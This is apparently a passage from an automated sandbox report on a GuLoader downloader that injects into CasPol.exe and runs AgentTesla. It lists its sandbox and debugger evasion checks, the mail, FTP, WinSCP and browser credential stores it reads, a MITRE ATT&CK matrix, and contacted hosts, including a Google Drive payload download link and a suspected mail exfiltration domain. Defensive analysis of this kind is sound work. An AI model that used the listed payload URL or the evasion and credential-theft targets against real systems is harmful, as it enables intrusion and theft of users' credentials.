            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX

            Malware Analysis System Evasion:

            barindex
            Tries to detect Any.runShow sources
            Source: C:\Users\user\Desktop\n#U00ba410000512664.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exe
            Source: C:\Users\user\Desktop\n#U00ba410000512664.exeFile opened: C:\Program Files\qga\qga.exe
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exe
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Program Files\qga\qga.exe
            Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
            Source: n#U00ba410000512664.exe, 00000000.00000002.938555147.0000000005480000.00000004.00000001.sdmpBinary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERWININET.DLLMOZILLA/5.0 (WINDOWS NT 6.1; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKOSHELL32ADVAPI32APPDATA=WINDIR=\MICROSOFT.NET\FRAMEWORK\V4.0.30319\CASPOL.EXE\SYSWOW64\MSVBVM60.DLL
            Source: n#U00ba410000512664.exe, 00000000.00000002.938555147.0000000005480000.00000004.00000001.sdmp, CasPol.exe, 00000008.00000002.5684651604.0000000000ED0000.00000004.00000001.sdmpBinary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
            Source: n#U00ba410000512664.exe, 00000000.00000002.935241245.00000000006C4000.00000004.00000020.sdmpBinary or memory string: \??\C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
            Source: CasPol.exe, 00000008.00000002.5684651604.0000000000ED0000.00000004.00000001.sdmpBinary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERWININET.DLLMOZILLA/5.0 (WINDOWS NT 6.1; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKOSHELL32ADVAPI32APPDATA=HTTPS://DRIVE.GOOGLE.COM/UC?EXPORT=DOWNLOAD&ID=12BEV52T0WQCEX9NQBV7JSBLB08XVI7JQ
            Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)Show sources
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
            Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)Show sources
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 380Thread sleep time: -2767011611056431s >= -30000s
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWindow / User API: threadDelayed 9946
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information queried: ProcessInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 922337203685477
            Source: C:\Users\user\Desktop\n#U00ba410000512664.exeSystem information queried: ModuleInformation
            Source: n#U00ba410000512664.exe, 00000000.00000002.938621902.0000000005549000.00000004.00000001.sdmp, CasPol.exe, 00000008.00000002.5700118992.0000000002BA9000.00000004.00000001.sdmpBinary or memory string: Hyper-V Guest Shutdown Service
            Source: n#U00ba410000512664.exe, 00000000.00000002.938621902.0000000005549000.00000004.00000001.sdmp, CasPol.exe, 00000008.00000002.5700118992.0000000002BA9000.00000004.00000001.sdmpBinary or memory string: Hyper-V Remote Desktop Virtualization Service
            Source: CasPol.exe, 00000008.00000002.5700118992.0000000002BA9000.00000004.00000001.sdmpBinary or memory string: vmicshutdown
            Source: n#U00ba410000512664.exe, 00000000.00000002.938621902.0000000005549000.00000004.00000001.sdmp, CasPol.exe, 00000008.00000002.5700118992.0000000002BA9000.00000004.00000001.sdmpBinary or memory string: Hyper-V Volume Shadow Copy Requestor
            Source: n#U00ba410000512664.exe, 00000000.00000002.938555147.0000000005480000.00000004.00000001.sdmpBinary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublisherwininet.dllMozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Geckoshell32advapi32APPDATA=windir=\Microsoft.NET\Framework\v4.0.30319\caspol.exe\syswow64\msvbvm60.dll
            Source: n#U00ba410000512664.exe, 00000000.00000002.938621902.0000000005549000.00000004.00000001.sdmp, CasPol.exe, 00000008.00000002.5700118992.0000000002BA9000.00000004.00000001.sdmpBinary or memory string: Hyper-V PowerShell Direct Service
            Source: CasPol.exe, 00000008.00000002.5684651604.0000000000ED0000.00000004.00000001.sdmpBinary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublisherwininet.dllMozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Geckoshell32advapi32APPDATA=https://drive.google.com/uc?export=download&id=12bEv52T0WqCex9NqBV7JSBLb08xvi7Jq
            Source: n#U00ba410000512664.exe, 00000000.00000002.938621902.0000000005549000.00000004.00000001.sdmp, CasPol.exe, 00000008.00000002.5700118992.0000000002BA9000.00000004.00000001.sdmpBinary or memory string: Hyper-V Time Synchronization Service
            Source: CasPol.exe, 00000008.00000002.5700118992.0000000002BA9000.00000004.00000001.sdmpBinary or memory string: vmicvss
            Source: CasPol.exe, 00000008.00000002.5692421448.000000000122A000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW
            Source: n#U00ba410000512664.exe, 00000000.00000002.938555147.0000000005480000.00000004.00000001.sdmp, CasPol.exe, 00000008.00000002.5684651604.0000000000ED0000.00000004.00000001.sdmpBinary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
            Source: n#U00ba410000512664.exe, 00000000.00000002.938621902.0000000005549000.00000004.00000001.sdmp, CasPol.exe, 00000008.00000002.5700118992.0000000002BA9000.00000004.00000001.sdmpBinary or memory string: Hyper-V Data Exchange Service
            Source: n#U00ba410000512664.exe, 00000000.00000002.938621902.0000000005549000.00000004.00000001.sdmp, CasPol.exe, 00000008.00000002.5700118992.0000000002BA9000.00000004.00000001.sdmpBinary or memory string: Hyper-V Heartbeat Service
            Source: n#U00ba410000512664.exe, 00000000.00000002.935241245.00000000006C4000.00000004.00000020.sdmpBinary or memory string: \??\C:\Program Files\Qemu-ga\qemu-ga.exe
            Source: n#U00ba410000512664.exe, 00000000.00000002.938621902.0000000005549000.00000004.00000001.sdmp, CasPol.exe, 00000008.00000002.5700118992.0000000002BA9000.00000004.00000001.sdmpBinary or memory string: Hyper-V Guest Service Interface
            Source: CasPol.exe, 00000008.00000002.5700118992.0000000002BA9000.00000004.00000001.sdmpBinary or memory string: vmicheartbeat

            Anti Debugging:

            barindex
            Hides threads from debuggersShow sources
            Source: C:\Users\user\Desktop\n#U00ba410000512664.exeThread information set: HideFromDebugger
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread information set: HideFromDebugger
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess token adjusted: Debug
            Source: C:\Users\user\Desktop\n#U00ba410000512664.exeProcess queried: DebugPort
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess queried: DebugPort
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 8_2_00C46950 LdrInitializeThunk,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeMemory allocated: page read and write | page guard

            HIPS / PFW / Operating System Protection Evasion:

            barindex
            Writes to foreign memory regionsShow sources
            Source: C:\Users\user\Desktop\n#U00ba410000512664.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: D00000
            Source: C:\Users\user\Desktop\n#U00ba410000512664.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\n#U00ba410000512664.exe"
            Source: CasPol.exe, 00000008.00000002.5698477726.0000000001750000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
            Source: CasPol.exe, 00000008.00000002.5698477726.0000000001750000.00000002.00020000.sdmpBinary or memory string: Progman
            Source: CasPol.exe, 00000008.00000002.5698477726.0000000001750000.00000002.00020000.sdmpBinary or memory string: Program ManagerN
            Source: CasPol.exe, 00000008.00000002.5698477726.0000000001750000.00000002.00020000.sdmpBinary or memory string: Progmanlock
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

            Stealing of Sensitive Information:

            barindex
            Yara detected AgentTeslaShow sources
            Source: Yara matchFile source: 00000008.00000002.5710719910.000000001DDF1000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: CasPol.exe PID: 4676, type: MEMORYSTR
            Tries to steal Mail credentials (via file / registry access)Show sources
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
            Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)Show sources
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
            Tries to harvest and steal ftp login credentialsShow sources
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\
            Tries to harvest and steal browser information (history, passwords, etc)Show sources
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
            Source: Yara matchFile source: 00000008.00000002.5710719910.000000001DDF1000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: CasPol.exe PID: 4676, type: MEMORYSTR

            Remote Access Functionality:

            barindex
            Yara detected AgentTeslaShow sources
            Source: Yara matchFile source: 00000008.00000002.5710719910.000000001DDF1000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: CasPol.exe PID: 4676, type: MEMORYSTR

            Mitre Att&ck Matrix

            Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
            Valid AccountsWindows Management Instrumentation211DLL Side-Loading1Process Injection112Masquerading1OS Credential Dumping2Query Registry1Remote ServicesEmail Collection1Exfiltration Over Other Network MediumEncrypted Channel21Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
            Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsDLL Side-Loading1Disable or Modify Tools1Credentials in Registry1Security Software Discovery421Remote Desktop ProtocolArchive Collected Data1Exfiltration Over BluetoothNon-Standard Port1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
            Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Virtualization/Sandbox Evasion341Security Account ManagerProcess Discovery2SMB/Windows Admin SharesData from Local System2Automated ExfiltrationIngress Tool Transfer1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
            Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection112NTDSVirtualization/Sandbox Evasion341Distributed Component Object ModelInput CaptureScheduled TransferNon-Application Layer Protocol2SIM Card SwapCarrier Billing Fraud
            Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptObfuscated Files or Information1LSA SecretsApplication Window Discovery1SSHKeyloggingData Transfer Size LimitsApplication Layer Protocol123Manipulate Device CommunicationManipulate App Store Rankings or Ratings
            Replication Through Removable MediaLaunchdRc.commonRc.commonDLL Side-Loading1Cached Domain CredentialsFile and Directory Discovery1VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
            External Remote ServicesScheduled TaskStartup ItemsStartup ItemsCompile After DeliveryDCSyncSystem Information Discovery115Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.

            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            n#U00ba410000512664.exe27%ReversingLabsWin32.Downloader.GuLoader

            Dropped Files

            No Antivirus matches

            Unpacked PE Files

            No Antivirus matches

            Domains

            SourceDetectionScannerLabelLink
            neopyme.com0%VirustotalBrowse
            x1.i.lencr.org1%VirustotalBrowse

            URLs

            SourceDetectionScannerLabelLink
            http://127.0.0.1:HTTP/1.10%Avira URL Cloudsafe
            http://x1.i.lencr.org/0%Avira URL Cloudsafe
            http://DynDns.comDynDNS0%Avira URL Cloudsafe
            http://XrlCbH.com0%Avira URL Cloudsafe
            http://cps.letsencrypt.org00%Avira URL Cloudsafe
            http://www.topqualityfreeware.com/0%Avira URL Cloudsafe
            https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha0%Avira URL Cloudsafe
            http://r3.i.lencr.org/090%Avira URL Cloudsafe
            http://x1.c.lencr.org/00%Avira URL Cloudsafe
            http://x1.i.lencr.org/00%Avira URL Cloudsafe
            http://gZr4dT3tmP.org0%Avira URL Cloudsafe
            http://r3.o.lencr.org00%Avira URL Cloudsafe
            http://topqualityfreeware.com0%Avira URL Cloudsafe
            http://mail.neopyme.com0%Avira URL Cloudsafe
            http://neopyme.com0%Avira URL Cloudsafe
            https://csp.withgoogle.com/csp/report-to/gse_l9ocaq0%Avira URL Cloudsafe

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            drive.google.com
            172.217.16.142
            truefalse
              high
              neopyme.com
              54.36.109.179
              truetrueunknown
              googlehosted.l.googleusercontent.com
              142.250.181.225
              truefalse
                high
                doc-00-5k-docs.googleusercontent.com
                unknown
                unknownfalse
                  high
                  x1.i.lencr.org
                  unknown
                  unknownfalseunknown
                  mail.neopyme.com
                  unknown
                  unknowntrue
                    unknown

                    Contacted URLs

                    NameMaliciousAntivirus DetectionReputation
                    https://doc-00-5k-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/mppp68ugon2ln1s6q81d25lmk78u5skq/1637587350000/06007705055686197661/*/12bEv52T0WqCex9NqBV7JSBLb08xvi7Jq?e=downloadfalse
                      high

                      URLs from Memory and Binaries

                      NameSourceMaliciousAntivirus DetectionReputation
                      http://127.0.0.1:HTTP/1.1CasPol.exe, 00000008.00000002.5710719910.000000001DDF1000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      low
                      http://x1.i.lencr.org/CasPol.exe, 00000008.00000002.5721809838.0000000020016000.00000004.00000001.sdmp, 2D85F72862B55C4EADD9E66E06947F3D0.8.drfalse
                      • Avira URL Cloud: safe
                      unknown
                      http://DynDns.comDynDNSCasPol.exe, 00000008.00000002.5710719910.000000001DDF1000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      http://XrlCbH.comCasPol.exe, 00000008.00000002.5710719910.000000001DDF1000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://doc-00-5k-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/mppp68ugCasPol.exe, 00000008.00000003.906849169.0000000001253000.00000004.00000001.sdmp, CasPol.exe, 00000008.00000003.911628810.000000000124E000.00000004.00000001.sdmpfalse
                        high
                        http://cps.letsencrypt.org0CasPol.exe, 00000008.00000002.5692421448.000000000122A000.00000004.00000020.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        http://www.topqualityfreeware.com/n#U00ba410000512664.exefalse
                        • Avira URL Cloud: safe
                        unknown
                        https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%haCasPol.exe, 00000008.00000002.5710719910.000000001DDF1000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://doc-00-5k-docs.googleusercontent.com/CasPol.exe, 00000008.00000002.5692421448.000000000122A000.00000004.00000020.sdmpfalse
                          high
                          https://drive.google.com/CasPol.exe, 00000008.00000002.5690976626.00000000011F9000.00000004.00000020.sdmpfalse
                            high
                            http://r3.i.lencr.org/09CasPol.exe, 00000008.00000002.5692421448.000000000122A000.00000004.00000020.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://x1.c.lencr.org/0CasPol.exe, 00000008.00000002.5692421448.000000000122A000.00000004.00000020.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://x1.i.lencr.org/0CasPol.exe, 00000008.00000002.5692421448.000000000122A000.00000004.00000020.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://gZr4dT3tmP.orgCasPol.exe, 00000008.00000002.5714737652.000000001DF21000.00000004.00000001.sdmp, CasPol.exe, 00000008.00000002.5714326963.000000001DEF7000.00000004.00000001.sdmp, CasPol.exe, 00000008.00000002.5710719910.000000001DDF1000.00000004.00000001.sdmp, CasPol.exe, 00000008.00000002.5713990797.000000001DEDD000.00000004.00000001.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            https://doc-00-5k-docs.googleusercontent.com/&CasPol.exe, 00000008.00000003.911628810.000000000124E000.00000004.00000001.sdmpfalse
                              high
